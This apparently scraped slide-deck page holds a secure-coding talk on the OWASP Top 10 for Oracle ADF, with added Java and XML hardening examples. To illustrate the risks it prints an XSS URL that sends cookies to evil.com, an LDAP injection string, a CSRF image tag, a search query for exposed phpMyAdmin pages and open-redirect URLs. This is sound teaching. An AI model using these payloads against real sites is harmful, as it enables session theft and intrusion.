Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 

OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF

7. Countermeasures
 "Connections" between systems are highly vulnerable
 Always assume data coming in could be "evil"
• Be sure to include "evil" use cases and user stories in your design
 Ideally, only allow the user to select among "safe" options
• Never allow them to pass data between systems unchecked
 If user-input text is needed, use parameterized statements (bind variables)
• Escaping quotes, parentheses and comment sequences by hand is a last resort, not a substitute: it is easy to miss a case the database parser still accepts
 Use a battle-tested library for protecting your database
• ADF prepared statements, OWASP's ESAPI codecs
8. Example
// good idea: the value travels as a bind variable, never as SQL text
// (assumes the view object's WHERE clause declares a bind variable named :id)
ViewObject studentVO = this.getStudentView();
studentVO.setNamedWhereClauseParam("id", id);

// bad idea! the value is spliced into the WHERE clause as SQL
ViewObject studentVO = this.getStudentView();
studentVO.setWhereClause("id = " + id);

// another bad idea! the whole statement is built from user input
String query = "select * from students where id=" + id;
ViewObject vo = appMod.createViewObjectFromQueryStmt(null, query);
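The countermeasures above name the database, the operating system, LDAP and web services as injection sinks, and the fix is the same for all of them: send user data as a parameter, never as part of the command text. The block below is an added example in plain Java (not code from the deck or from ADF) for the LDAP case, where concatenating a user-supplied uid into a search filter is the directory equivalent of the string-built SQL above. The `escape` helper applies the RFC 4515 filter-escaping rules; `unsafeFilter`, `safeFilter` and the attacker string are constructed for the demonstration.

```java
import java.nio.charset.StandardCharsets;

/**
 * Added example (not from the original deck): escaping user input before it is
 * spliced into an LDAP search filter, the LDAP analogue of a SQL bind variable.
 * RFC 4515 requires the characters * ( ) \ and NUL to be written as a backslash
 * followed by their two-digit hex code; non-ASCII characters are escaped byte
 * by byte as UTF-8, which the RFC also allows.
 */
public class LdapFilterEscape {

    /** Escape one assertion value for use inside an LDAP filter expression. */
    public static String escape(String value) {
        StringBuilder out = new StringBuilder(value.length());
        for (byte b : value.getBytes(StandardCharsets.UTF_8)) {
            int c = b & 0xff;
            boolean special = c == '*' || c == '(' || c == ')' || c == '\\' || c == 0;
            if (special || c > 0x7f) {
                out.append('\\').append(String.format("%02x", c));
            } else {
                out.append((char) c);
            }
        }
        return out.toString();
    }

    /** Vulnerable: user input concatenated straight into the filter. */
    public static String unsafeFilter(String uid) {
        return "(&(objectClass=person)(uid=" + uid + "))";
    }

    /** Hardened: the same filter with the value escaped first. */
    public static String safeFilter(String uid) {
        return "(&(objectClass=person)(uid=" + escape(uid) + "))";
    }

    public static void main(String[] args) {
        // Constructed attacker input: closes the uid assertion and appends a
        // wildcard assertion, so the unsafe filter matches every person entry.
        String attack = "*)(uid=*";
        System.out.println("unsafe: " + unsafeFilter(attack));
        System.out.println("safe:   " + safeFilter(attack));
    }
}
```

With `*)(uid=*` as input the unsafe filter becomes `(&(objectClass=person)(uid=*)(uid=*))`, which matches every person in the directory, while the escaped filter contains `uid=\2a\29\28uid=\2a` and matches only an entry whose uid is literally that string. With JNDI the equivalent of a prepared statement is `DirContext.search(name, "(uid={0})", new Object[]{uid}, controls)`: the `{0}` placeholder is filled in with exactly this escaping, so prefer it over building the filter yourself.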
9. ADF Input Validation
 Occurs on most components automatically
• Additional validator and converter tags are available for tighter filtering
• validateLength, validateLongRange, convertDateTime, etc.
 Exception: when immediate=true on some components
• The raw, unfiltered submitted value can then be read from a managed bean before validation has run
 Hidden fields do not equal secure fields
• Expect hackers to tamper with the HTML and insert their own values
• selectOne and selectMany reject values that were not in the offered list, so they are safe
 Use caution with custom AJAX layers
• Not always subject to ADF input validation
10. 2) Broken Authentication and Session Management
 HTTP is a "stateless" protocol
• Nice and simple: HTTP request, HTTP response
• All data must be passed in the request every time
 How do we store state?
• Client side with cookies
• Server side with sessions
 Most apps place a "sessionId" in cookies, or in the URL
• Problem: now stealing a sessionId is just as good as stealing a password!
 Multiple ways to obtain a session ID
• Packet sniffing, especially on an open WiFi access point
• HTTP Referer logs of other sites, if the sessionId is in the URL
11. Countermeasures
 Assume that an attacker has stolen a session ID
• Determine how bad this would be in your application
 Use TLS (SSL) everywhere!
• Makes it much harder for people to "sniff" your session ID
 If you cannot use TLS everywhere, use it at least for logins, and mark the session cookie Secure so it is never sent over plain HTTP
• Have a cryptographically strong session ID (the ADF/WebLogic default)
• Have a reasonable idle timeout, one hour is fine
• Issue a fresh session ID at login, so a session an attacker fixed before authentication is worthless afterwards
12. ADF Countermeasures
 Don't pass the jsessionid in the URL, put it in a cookie
• Evil sites can read your session ID from their Referer logs
• Cookies are much harder to sniff when TLS is enabled
 Sample snippet (this element belongs in weblogic.xml, the WebLogic deployment descriptor, not in web.xml)
<session-descriptor>
  <cookie-name>MYAPPSESSID</cookie-name>
  <url-rewriting-enabled>false</url-rewriting-enabled>
  <timeout-secs>3600</timeout-secs>
</session-descriptor>
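The same protections can be declared portably in web.xml on any Servlet 3.0 container (WebLogic 12c and later). The fragment below is an added example, not from the deck: it disables URL rewriting of the session id, and additionally marks the cookie HttpOnly and Secure so that neither page scripts nor plain-HTTP requests can expose it. The cookie name is the deck's `MYAPPSESSID`; the 60-minute timeout matches the `timeout-secs` above.

```xml
<!-- web.xml (Servlet 3.0+), added example: keep the session id out of URLs and
     out of reach of scripts and cleartext connections -->
<session-config>
  <session-timeout>60</session-timeout>            <!-- minutes -->
  <cookie-config>
    <name>MYAPPSESSID</name>
    <http-only>true</http-only>                    <!-- document.cookie cannot read it -->
    <secure>true</secure>                          <!-- only ever sent over TLS -->
  </cookie-config>
  <tracking-mode>COOKIE</tracking-mode>            <!-- never append ;jsessionid=... to URLs -->
</session-config>
```

After deploying, confirm the headers rather than trusting the descriptor: the `Set-Cookie` on the login response should carry both `HttpOnly` and `Secure`, and no link on any page should contain `;jsessionid=`.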
13. 3) Cross Site Scripting (XSS)
 Sites must "cleanse" (encode) user input before displaying it
• HTML tags can be very dangerous
• If a user can embed a <SCRIPT> tag, all is lost!
 Hackers can craft URLs that inject their own HTML onto the page
• Can be used to do almost any kind of attack!!!
 ADF is mostly safe, but occasionally vulnerable
• User generated content is usually HTML encoded on the page
• <script> becomes &lt;script&gt;
• Use caution with the af:resource or f:verbatim tags, and with escape="false" on output components
• Never pass in unencoded data!
14. Example
 Example: JSP to draw HTML based on user input
• String html = "<input name='item' type='TEXT' value='" + request.getParameter("item") + "'>";
 Code expects a nice URL:
• http://example.com/buy?item=123
 But a hacker could supply this URL:
• http://example.com/buy?item='><script>document.location='http://evil.com/steal/'+document.cookie</script>
 Then trick an administrator or superuser into visiting it
• Cookie is stolen, and now the evil user can connect as the admin!
15. Countermeasures
 Never, ever, ever trust user-submitted content!
 Properly "escape" (encode) any data before displaying it on web pages, using the encoder for the context it lands in
• HTML text, HTML attributes, JavaScript parameters, URL parameters and STYLE elements each need a different encoding
• If users may submit HTML, sanitize it against an allowlist of tags and attributes; stripping <script> tags or SRC attributes by hand is easily bypassed
• Done automatically in ADF, but it is your job if you bypass ADF and write raw markup or JS
• Use the ESAPI encoders to "cleanse" data before dumping it to the page
 Do not allow state changes from HTTP GET requests
• Otherwise, a rogue IMG tag could delete content
• No state change on initial ADF page load!
 Set the HttpOnly flag on the session cookie
• Stops JavaScript from reading it through document.cookie, so an XSS payload cannot simply mail the cookie home (it does not stop the injected script from acting inside the page)
16. 4) Insecure Direct Object Reference
 Assume my project id is 123
 I see a link on the "My Projects" page that goes here:
• http://example.com/projects/123
 If I alter the URL, can I see other people's projects?
• http://example.com/projects/124
 Do you only restrict access in the web form?
 What if I could "guess" the URL? Could I see the page?
• Don't trick yourself into thinking complex URLs are any more secure
• Security != Obscurity
17. Countermeasures
 Every resource needs a security level
• What roles do you need to access certain items?
• Access Control Lists are easy to implement, but don't always scale
 All access to that resource should go through the same check
• What action are you taking, with what resource?
• Put it all in one common codebase for simplicity
• May need to run the check multiple times, for sub-actions and sub-resources
• Unusual behavior? Have additional authentication questions/layers!
 Front-end restriction is nice for usability, but it is not security
 Ideally, put all security in the Application Module (model)
• Single location to secure multiple views
18. Countermeasures, ctd.
 Avoid direct object references
• Use a temporary, per-user indirect reference instead of the real ID
• Generate it from a cryptographically strong random source
 Validate all references, regardless
 Validate access to that reference, per operation
• Read, write, update, delete
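The two slides above describe an indirect reference map: hand each user random handles that stand in for the real IDs, and still check authorization on every use. The block below is an added example in plain Java (not code from the deck or ADF) of that pattern for the project URLs on slide 16. The `IndirectReferenceMap` class, the users alice and bob and their project sets are constructed for the demonstration; in a real application the map would live in the HTTP session and the ownership check would consult the model.

```java
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.util.Set;

/**
 * Added example (not from the original deck): an indirect reference map.
 * Instead of exposing the real project id (123) in the URL, each user session
 * hands out random opaque handles that are valid only in that session and only
 * for resources the user was authorised to see. A handle guessed, or copied
 * from another user, resolves to nothing. Authorisation is re-checked on every
 * resolve, because the map is a convenience, not the access control.
 */
public class IndirectReferenceMap {
    private static final SecureRandom RNG = new SecureRandom();

    /** handle -> real id; one map per user session (here: per instance). */
    private final Map<String, Long> handles = new HashMap<>();
    private final String user;
    private final Set<Long> ownedProjects;   // stand-in for the real authorisation source

    public IndirectReferenceMap(String user, Set<Long> ownedProjects) {
        this.user = user;
        this.ownedProjects = ownedProjects;
    }

    /** Called when rendering a link; only authorised ids ever receive a handle. */
    public String handleFor(long projectId) {
        if (!ownedProjects.contains(projectId)) {
            throw new SecurityException(user + " may not reference project " + projectId);
        }
        byte[] raw = new byte[16];                       // 128 random bits: not guessable
        RNG.nextBytes(raw);
        String handle = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
        handles.put(handle, projectId);
        return handle;
    }

    /** Called when a request arrives; re-checks authorisation on every use. */
    public long resolve(String handle) {
        Long id = handles.get(handle);
        if (id == null || !ownedProjects.contains(id)) {
            throw new SecurityException("unknown or unauthorised reference");
        }
        return id;
    }

    public static void main(String[] args) {
        // Constructed data: alice owns project 123, bob owns project 124
        IndirectReferenceMap alice = new IndirectReferenceMap("alice", Set.of(123L));
        IndirectReferenceMap bob   = new IndirectReferenceMap("bob",   Set.of(124L));

        String link = alice.handleFor(123);              // goes into alice's "My Projects" URL
        System.out.println("alice's link: /projects/" + link + " -> " + alice.resolve(link));

        try {
            bob.resolve(link);                           // alice's handle means nothing in bob's session
        } catch (SecurityException e) {
            System.out.println("bob reusing alice's handle: " + e.getMessage());
        }
        try {
            alice.handleFor(124);                        // slide 16: altering the id to 124
        } catch (SecurityException e) {
            System.out.println("alice asking for 124: " + e.getMessage());
        }
    }
}
```

The handle is 128 random bits, so guessing is hopeless, and because it is looked up in the requesting user's own session there is nothing to enumerate even if one leaks. The second check in `resolve` matters when rights change mid-session: a handle issued while alice owned a project stops working the moment she no longer does.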
19. ADF Global Security Expressions
#{securityContext.authenticated}
#{securityContext.userName}
#{securityContext.userInRole['roleList']}
#{securityContext.userInAllRoles['roleList']}
#{securityContext.taskflowViewable['target']}
#{securityContext.regionViewable['target']}
#{securityContext.userGrantedResource['permission']}
#{securityContext.userGrantedPermission['permission']}
20. 5) Security Misconfiguration
 Everything from the OS to the DB to the ADF framework
 What if ADF issued a security patch?
• Do you have a centralized policy for keeping dependencies up-to-date?
• How long would it take you to discover the new code?
• How long would it take to recompile/test/redeploy?
 Do you know all the security configurations in the framework?
• Odds are no... documentation is usually obtuse
• "Being helpful is a security hole"
 Have you properly "hardened" your infrastructure?
• Delete default users, disable unused services and ports
• Operating System, WebLogic, Database, MDS
21. Countermeasures
 Subscribe to vendor security advisories and blog feeds to learn about patches
• Use automation if possible to verify that patches are actually applied
 Do periodic scans to detect misconfiguration / missing patches
 Disable ports/services/features unused in production
 Disable default users and change default passwords
 Never send stack traces or SQL errors directly to end users
 Taking over websites shouldn't be this easy:
• http://www.google.com/search?q=inurl:SELECT+inurl:FROM+inurl:WHERE+intitle:phpmyadmin
22. 6) Sensitive Data Exposure
 All applications store sensitive data
• Credit cards, passwords, private health/financial documents
 Where does this data get stored?
• Database, files, logs, backups, etc.
 Where does this data get sent?
• Over the web, backup databases, partners, internal emails
• JMS queues, web service calls
 How are you preventing unauthorized access to all these resources?
23. Storage Layer Countermeasures
 If you store secrets, encrypt them!
• Use only battle-tested standard encryption algorithms
 Analyze possible threats: inside attack, external user
• Make sure the encryption policy is appropriate for the threats
 Encrypt data anywhere it's stored long term
• Especially backups!
• Store backups of decryption keys separately from the data
 Restrict access to decrypted data to only authorized users
 Hash all passwords with a standard, deliberately slow algorithm (PBKDF2, bcrypt, scrypt) and a per-user "salt"; a plain MD5 or SHA-1 of the password is not enough
 Use strong keys, and manage them as carefully as the data they protect
 Create a password management policy, and stick with it!
24. Sane Pass Phrase Management Policy
(image-only slide)
25. Transport Layer Countermeasures
 Use strong, standards-compliant network security protocols
• Use TLS (SSL) on all connections carrying sensitive data
 Encrypt messages before transmission
• XML-Encryption
 Sign messages before transmission
• XML-Signature
 Disable old, flawed protocol versions and ciphers (e.g., SSL 2.0 and 3.0, RC4)
26. 7) Missing Function Level Access Control
 Similar to Insecure Direct Object Reference
• Need to block specific actions, even if no resource is identified
 Example: my project is 123
 I will see these URLs on my home page:
• http://example.com/project/123
• http://example.com/user/getProjects/
 I could fish around and try other URLs as well:
• http://example.com/manager/getProjects/
• http://example.com/admin/getProjects/
 Would your application prevent this?
 Same general issue:
• you have front-end security, but not back-end security
27. Countermeasures
 Do authorization checks at least twice
• Front-end UI, and back-end controller/model
 Don't draw URLs on the page if the user cannot access them
• Bad usability
• Hackers might be tempted to fish around for vulnerabilities
 Never assume a URL is allowed
• Do back-end checks for access, and for state change
 Add even more layers as needed:
• Does all security information exist in the URL?
• Can you authorize right away?
• Might you need to get half way through the request before you know what rights are needed?
• What if the user has access, but their behavior is unusual?
• Should you prompt for the password again, or perhaps for additional authorization?
28. 8) Cross-Site Request Forgery
 Evil sites can make your browser send authenticated requests on your behalf:
1) User logs into a secure application behind the firewall: http://example.com/myApp
2) User goes to an "evil" website, or loads up an "evil" HTML email
3) The HTML contains this image: <img src="http://example.com/myApp/deleteEverything"></img>
• The browser attaches the user's session cookie automatically, so the request looks legitimate to the server
 Combined with JavaScript and XSS, evil sites can completely take over your browser
• Can browse around your intranet, log into bank accounts
• Anything you are currently logged into
• Complete control, as long as you stay on the evil site
 Unfortunate side-effect of Single Sign-On and long-lived sessions
29. Countermeasures
 Need a unique token to validate that the request is authentic
• The jsessionId on its own is not that token: the browser attaches the cookie automatically, and it can be stolen with XSS
• More secure: a unique token for every HTTP request
• If somebody steals your token, they can only do one request!
 Steps to validate every request
• Put a random number in the session as the next valid token
• Put that token on every HTML web form that causes a state change
• When processing a request, validate the token
• Generate another random token for the next request
• Place that token in the session, repeat forever!
• NOTE: JSF 2.0's javax.faces.ViewState already acts as a per-view token for POST requests, so the extra token may not be needed for JSF 2.x postbacks (GET requests are not covered)
 http://blog.eisele.net/2011/02/preventing-csrf-with-jsf-20.html
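The step list above is the synchronizer token pattern. The block below is an added example in plain Java (not code from the deck, ADF or JSF) implementing it: a per-session store that issues the current token for forms, validates a submission in constant time and retires the token once it has been used. The `CsrfTokenStore` class and the `csrfToken` field name are constructed for the demonstration; in a real application the store would be a session attribute and `validateAndRotate` would run in the controller before any state change.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;

/**
 * Added example (not from the original deck): the per-request synchronizer
 * token described above. The session holds the currently valid token; every
 * state-changing form carries it in a hidden field; the server checks it in
 * constant time and then replaces it, so a token captured once buys the
 * attacker at most one already-spent request. A cross-site <img> or
 * auto-submitting form cannot read the token, so it cannot forge a request.
 */
public class CsrfTokenStore {
    private static final SecureRandom RNG = new SecureRandom();

    /** Stand-in for the HttpSession attribute holding the next valid token. */
    private String currentToken = newToken();

    private static String newToken() {
        byte[] raw = new byte[32];                              // 256 random bits
        RNG.nextBytes(raw);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
    }

    /** Called while rendering a form: the token to embed as a hidden field. */
    public String tokenForForm() {
        return currentToken;
    }

    /** Hidden-field markup; the token is base64url, so it needs no HTML encoding. */
    public String hiddenField() {
        return "<input type=\"hidden\" name=\"csrfToken\" value=\"" + tokenForForm() + "\">";
    }

    /** Called when the form is submitted. Accepts a token exactly once. */
    public synchronized boolean validateAndRotate(String submitted) {
        if (submitted == null) {
            return false;                                       // forged request: no token at all
        }
        byte[] expected = currentToken.getBytes(StandardCharsets.UTF_8);
        byte[] actual = submitted.getBytes(StandardCharsets.UTF_8);
        if (!MessageDigest.isEqual(expected, actual)) {         // constant-time compare
            return false;                                       // keep the token: a forged miss must not break the user's open form
        }
        currentToken = newToken();                              // accepted once, then retired
        return true;
    }

    public static void main(String[] args) {
        CsrfTokenStore session = new CsrfTokenStore();          // one per logged-in user session
        System.out.println("rendered: " + session.hiddenField());

        String token = session.tokenForForm();                  // what the genuine page carried
        System.out.println("forged: no token      -> " + session.validateAndRotate(null));
        System.out.println("forged: guessed token -> " + session.validateAndRotate("deleteEverything"));
        System.out.println("genuine form submit   -> " + session.validateAndRotate(token));
        System.out.println("replay of same token  -> " + session.validateAndRotate(token));
    }
}
```

The four calls in `main` print false, false, true, false: a request without a token or with a guessed one is refused, the real form submits once, and replaying its token fails because it was rotated on success. Rotating only on success is deliberate; if a forged miss also rotated the token, an attacker could invalidate a form the victim has open by firing a single bad request.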
30. 9) Using Components with Known Vulnerabilities
 In addition to ADF, you may use other frameworks
• Open source libraries
• OEM libraries
• JavaScript frameworks
• JARs and JARs and JARs of fun...
 Automated hacker tools can fingerprint these dependencies
• Unless you track and patch every known-vulnerable version, you are vulnerable
 All possible attack vectors are open
• XSS, injection, CSRF being the most common and most troublesome
• Ranges from annoying to complete takeover of your servers
31. Countermeasures
 At a minimum, manually keep track of dependencies/versions
• Developers must justify every JAR they depend on
• Must manually keep track of the version, and check before each release
 Better still, use Maven to perform automated builds
• Automatically check your JAR versions against the latest stable releases and against published vulnerability reports
 Both have risks to the build process
• What if you have to refactor your code every time the JAR is revised?
• Annoying, but a necessary step to secure your applications
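One way to make the Maven build above do the checking for you is the OWASP dependency-check plugin, which matches every JAR on the classpath against published CVEs. The fragment below is an added example, not from the deck; the CVSS threshold of 7 and the version placeholder are choices for this example, and the version must be pinned to a current release before use.

```xml
<!-- pom.xml fragment, added example: fail the build when a dependency has a
     published CVE at or above the threshold. Pin <version> to a current release. -->
<build>
  <plugins>
    <plugin>
      <groupId>org.owasp</groupId>
      <artifactId>dependency-check-maven</artifactId>
      <version>REPLACE_WITH_CURRENT_RELEASE</version>
      <configuration>
        <failBuildOnCVSS>7</failBuildOnCVSS>   <!-- break the build on high and critical findings -->
      </configuration>
      <executions>
        <execution>
          <goals>
            <goal>check</goal>               <!-- runs during mvn verify -->
          </goals>
        </execution>
      </executions>
    </plugin>
  </plugins>
</build>
```

This answers the "known vulnerabilities" half of the slide; for the "latest stable release" half, `mvn versions:display-dependency-updates` from the versions-maven-plugin lists every dependency that has a newer release than the one you pin.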
32. 10) Unvalidated Redirects and Forwards
 Most sites allow redirects to other sites, or pages within the site:
• http://example.com/redirect?url=google.com
 But open redirect pages can be used by "phishers" to create links to their site:
• http://example.com/redirect?url=evil.com
 The link looks like it goes to "example.com", but it goes to "evil.com"
 Or it can trick a site user into harming their own site:
• http://example.com/redirect?url=/admin.jsp?deleteEverything=true
 Sometimes called "phishing holes"
33. ADF Attack Vectors
 Common places to do redirects
• PagePhaseListener
• Download Servlet
• Task Flow router
 Example code for a redirect:
// redirect() sends an HTTP 302 to the browser; the target must come from your
// own code or an allowlist, never straight from a request parameter
FacesContext fctx = FacesContext.getCurrentInstance();
fctx.getExternalContext().redirect("http://google.com");
34. Countermeasures
 Restrict redirects to a limited list of "trusted" sites
 Keep a list of all redirect URLs, and pass the ID in the request instead of the URL
• http://example.com/redirect?urlId=123
 Or HMAC the URL with a secret key and pass the hash alongside it; refuse the redirect if the hash does not verify
• http://example.com/redirect?url=google.com&hash=a1b2c3
 Example: does this URL look like a Google invoice to you?
• http://www.google.com/#invoiceId=123&q=oHg5SJYRHA0&btnI=3564
 Question: are URL shorteners inherently unsafe?
• TinyUrl offers a "preview" feature: others should as well
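The first and third countermeasures above, a host allowlist and an HMAC over the URL, are worked through below as an added example in plain Java (not code from the deck or ADF). `allowlisted` accepts site-relative paths and absolute http/https URLs whose host is trusted, and refuses the phishing and scheme tricks a redirect page typically receives; `sign`/`verify` implement the `hash` parameter. The trusted-host list, the secret key and the candidate URLs are constructed for the demonstration.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Base64;
import java.util.Set;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

/**
 * Added example (not from the original deck): validating a redirect target.
 * The allowlist accepts only paths within the site and absolute URLs on trusted
 * hosts; the HMAC lets the application issue links to any destination it chose
 * itself without the redirect page being open to everyone.
 */
public class SafeRedirect {
    private static final Set<String> TRUSTED_HOSTS = Set.of("example.com", "www.example.com", "google.com");
    private static final byte[] SECRET = "constructed-demo-key-rotate-me".getBytes(StandardCharsets.UTF_8);

    /** Allowlist check. Returns the target if acceptable, null otherwise. */
    public static String allowlisted(String target) {
        URI uri;
        try {
            uri = new URI(target);
        } catch (URISyntaxException e) {
            return null;                                     // unparsable: refuse
        }
        if (uri.getScheme() == null && uri.getHost() == null && uri.getPath() != null
                && uri.getPath().startsWith("/") && !target.startsWith("//")) {
            return target;                                   // site-relative path such as /projects/123
        }
        if (!"https".equals(uri.getScheme()) && !"http".equals(uri.getScheme())) {
            return null;                                     // javascript:, data:, scheme-relative, ...
        }
        String host = uri.getHost();
        if (host == null || !TRUSTED_HOSTS.contains(host.toLowerCase())) {
            return null;                                     // untrusted or look-alike host
        }
        return target;
    }

    /** Signs a URL the application itself chose, for links of the form ?url=...&hash=... */
    public static String sign(String target) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(SECRET, "HmacSHA256"));
        byte[] tag = mac.doFinal(target.getBytes(StandardCharsets.UTF_8));
        return Base64.getUrlEncoder().withoutPadding().encodeToString(tag);
    }

    /** Verifies the hash parameter in constant time; without SECRET it cannot be forged. */
    public static boolean verify(String target, String hash) throws Exception {
        if (hash == null) {
            return false;
        }
        byte[] expected = sign(target).getBytes(StandardCharsets.UTF_8);
        byte[] actual = hash.getBytes(StandardCharsets.UTF_8);
        return MessageDigest.isEqual(expected, actual);
    }

    public static void main(String[] args) throws Exception {
        // Constructed candidate targets, including the phishing cases from slide 32
        String[] candidates = {
            "/projects/123",
            "https://google.com/",
            "https://evil.com/",
            "//evil.com/",                                   // scheme-relative: browser goes to evil.com
            "https://example.com.evil.com/",                 // prefix look-alike: host is not in the list
            "https://google.com@evil.com/",                  // userinfo trick: host is evil.com
            "javascript:alert(document.cookie)"
        };
        for (String c : candidates) {
            System.out.println((allowlisted(c) == null ? "refuse  " : "allow   ") + c);
        }

        String hash = sign("https://partner.example.net/invoice");
        System.out.println("signed link verifies:   " + verify("https://partner.example.net/invoice", hash));
        System.out.println("tampered link verifies: " + verify("https://evil.com/", hash));
    }
}
```

Only the first two candidates are allowed; the rest are the shapes that defeat a naive `startsWith("http://example.com")` or `contains("google.com")` test, which is why the check parses the URL and compares the whole host. The signed link verifies and the tampered one does not, so an application can still hand out redirects to arbitrary partner URLs as long as it, and not the user, chose them. Note that the slide-32 `/admin.jsp?deleteEverything=true` case passes the allowlist, because it is a legitimate page on the site; that one is closed by slide 15's rule that GET requests never change state.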
35. References
 OWASP Top 10, and associated resources
• https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
 ADF code guidelines to prevent security holes:
• http://www.oracle.com/technetwork/developer-tools/adf/learnmore/adf-code-guidelines-v1-00-1845659.pdf
 JavaScript best practices for ADF
• http://www.oracle.com/technetwork/developer-tools/jdev/1-2011-javascript-302460.pdf
 Hardening Fusion Middleware to avoid OWASP issues:
• http://antonfroehlich.blogspot.com/2012/06/handling-owasp-top-ten-application.html
 JSF and OWASP
• http://turbomanage.files.wordpress.com/2009/10/securing-jsf-applications-against-owasp-top-ten-color.pdf
36. Questions?
 My Company: http://bezzotech.com
 My Blog: http://bexhuff.com
 My Slides: http://slideshare.com/bexmex
 My Tweets: @bex
 My Self: bex@bezzotech.com